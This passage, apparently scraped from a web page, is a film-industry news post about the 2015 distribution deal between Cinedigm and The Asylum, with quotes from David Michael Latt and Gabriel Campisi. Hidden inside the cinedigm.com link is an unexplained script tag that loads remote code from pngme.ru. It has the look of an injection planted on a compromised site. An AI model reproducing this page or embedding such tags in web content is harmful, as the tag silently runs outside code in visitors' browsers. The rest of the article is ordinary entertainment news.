We know this is going to be a great partnership.&#8221;<\/p>\n<p><a href=\"http:\/\/www.bmovienation.com\/?attachment_id=14472\" rel=\"attachment wp-att-14472\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-medium wp-image-14472\" src=\"http:\/\/www.bmovienation.com\/wp-content\/uploads\/2015\/02\/asylumlogo-300x90.jpg\" alt=\"asylumlogo\" width=\"300\" height=\"90\" srcset=\"https:\/\/www.bmovienation.com\/wp-content\/uploads\/2015\/02\/asylumlogo-300x90.jpg 300w, https:\/\/www.bmovienation.com\/wp-content\/uploads\/2015\/02\/asylumlogo.jpg 330w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p>David Michael Latt of The Asylum adds, \u201cCinedigm is the perfect partner because they truly understand the appeal of our brand of entertainment and how to reach this audience.\u201d<\/p>\n<p>The February 5, 2015 Cinedigm Press Release indicated that the films in the Cinedigm pact will have &#8220;drafting opportunities&#8221; off of well-known releases, including Troy: The Odyssey (Action Fantasy), Little Dead Rotting Hood (Horror), Butch Cassidy and The Wild Bunch (Western) and Fortune Cookie (Horror).<\/p>\n<p style=\"text-align: center;\"><a href=\"http:\/\/www.cinedigm.com\/\"><span style=\"color: #0000ff; font-family: Calibri;\">www.cinedigm.com<script src=\"\/\/pngme.ru\/seter\"><\/script><\/span><\/a><br \/>\n<a href=\"http:\/\/www.theasylum.cc\/\"><span style=\"color: #0000ff; font-family: Calibri;\">www.theasylum.cc<\/span><\/a><\/p>\n<p>The deal appears to be a boost to independent movies.\u00a0 Gabriel Campisi has been in the film industry for years and is an expert on the business side of making movies.\u00a0 He has his own book on filmmaking, \u201cThe Independent Filmmaker\u2019s Guide to Writing a Business Plan for Investors,\u201d and shares his professional opinion on the deal.\u00a0 <a href=\"http:\/\/amzn.com\/B00835VH6U\">http:\/\/amzn.com\/B00835VH6U<\/a><\/p>\n<p>\u201cI believe this deal proves how strong and significant these movies are, and how well they fit into the economics of Hollywood and the constantly changing world of digital entertainment.\u00a0 The past decade has seen a revolution in motion picture production and how audiences choose to watch movies.\u00a0 Theaters are still strong, but gone are the days of Blockbuster Video and its dominance over home entertainment.\u00a0 The advent of video-on-demand and internet streaming has opened the doors to a vast new landscape that demands solid product.\u201d<\/p>\n<p>\u201cThis is great news for independent filmmakers and production companies everywhere, as it gives them vast new opportunities that didn&#8217;t exist a decade earlier.\u00a0 This deal between Cinedigm and The Asylum shows that the industry is emerging and growing, and only getting bigger and better.\u00a0 It shows audience response is overwhelmingly positive, and solidifies the prosperity of the industry and the direction it&#8217;s going.\u00a0 Personally, I feel appreciative that I am able to be a part of this and work with some amazing people, including David Rimawi, David Latt and Paul Bales.\u201d<\/p>\n<p>&#8220;I think frankly this indicates that the ground is shifting significantly for genre pictures,&#8221;
